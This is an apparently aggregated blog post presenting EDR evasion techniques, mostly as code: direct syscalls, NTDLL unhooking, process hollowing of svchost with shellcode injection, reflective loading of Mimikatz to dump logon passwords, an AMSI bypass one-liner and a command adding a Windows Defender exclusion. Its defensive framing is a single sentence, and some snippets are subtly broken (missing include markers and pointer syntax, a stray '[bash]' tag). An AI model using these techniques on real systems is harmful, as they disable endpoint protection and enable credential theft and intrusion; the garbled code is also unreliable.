Listen to this Post
Security researchers and red teamers constantly explore methods to bypass Endpoint Detection and Response (EDR) solutions. Understanding these techniques is crucial for both offensive and defensive cybersecurity professionals.
You Should Know: Practical EDR Bypass Techniques
1. Process Injection with Syscalls (Direct System Calls)
Many EDR solutions hook user-mode APIs to monitor malicious activity. Bypassing these hooks involves making direct syscalls.
Example (x64 Assembly for NtAllocateVirtualMemory):
mov r10, rcx mov eax, 18h ; Syscall number for NtAllocateVirtualMemory syscall ret
C++ Implementation:
include <windows.h>
include <iostream>
typedef NTSTATUS(NTAPI pNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
int main() {
HMODULE ntdll = GetModuleHandleA("ntdll.dll");
pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory");
PVOID baseAddr = NULL;
SIZE_T size = 0x1000;
NtAllocateVirtualMemory(GetCurrentProcess(), &baseAddr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
std::cout << "Memory allocated at: " << baseAddr << std::endl;
return 0;
}
2. Unhooking NTDLL.dll
EDRs often hook `NTDLL.dll` functions. Unhooking involves overwriting hooked functions with clean versions from disk.
Steps:
1. Read `NTDLL.dll` from disk.
2. Map a clean copy into memory.
3. Overwrite hooked functions in memory.
PowerShell Command to Dump Clean NTDLL:
$ntdll = Get-Content -Path "C:\Windows\System32\ntdll.dll" -Encoding Byte
[System.IO.File]::WriteAllBytes("C:\clean_ntdll.dll", $ntdll)
3. Process Hollowing (Legit Process Replacement)
A technique where a legitimate process is created in a suspended state, its memory is unmapped, and malicious code is injected.
Example (C++):
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\Windows\System32\svchost.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
// Unmap original code and inject shellcode
LPVOID remoteMem = VirtualAllocEx(pi.hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, remoteMem, shellcode, shellcodeSize, NULL);
QueueUserAPC((PAPCFUNC)remoteMem, pi.hThread, (ULONG_PTR)remoteMem);
ResumeThread(pi.hThread);
4. Reflective DLL Injection
Loading a DLL directly from memory without touching disk.
Mimikatz Example:
Invoke-ReflectivePEInjection -PEBytes $mimikatzBytes -ExeArgs "sekurlsa::logonpasswords"
5. AMSI Bypass (For PowerShell Evasion)
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
What Undercode Say
EDR evasion is a cat-and-mouse game. Security vendors continuously improve detection, while attackers develop new bypass methods. Key takeaways:
– Direct syscalls evade user-mode hooks.
– Unhooking NTDLL restores original function behavior.
– Process hollowing abuses trusted processes.
– Reflective loading avoids disk-based detection.
– AMSI bypasses disable script scanning.
Linux Equivalent Commands:
Check for hooked libc functions
strace -e trace=open,read,write ./malicious_binary
Manual syscall invocation (x86)
<strong>asm</strong>("movl $4, %eax\n" // write syscall
"movl $1, %ebx\n" // stdout
"movl $message, %ecx\n"
"movl $12, %edx\n"
"int $0x80");
Windows Defender Exclusion Bypass:
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Temp\'"
Expected Output:
A functional EDR bypass PoC demonstrating evasion techniques in a controlled environment.
Relevant URLs:
References:
Reported By: Malfuzzer Just – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
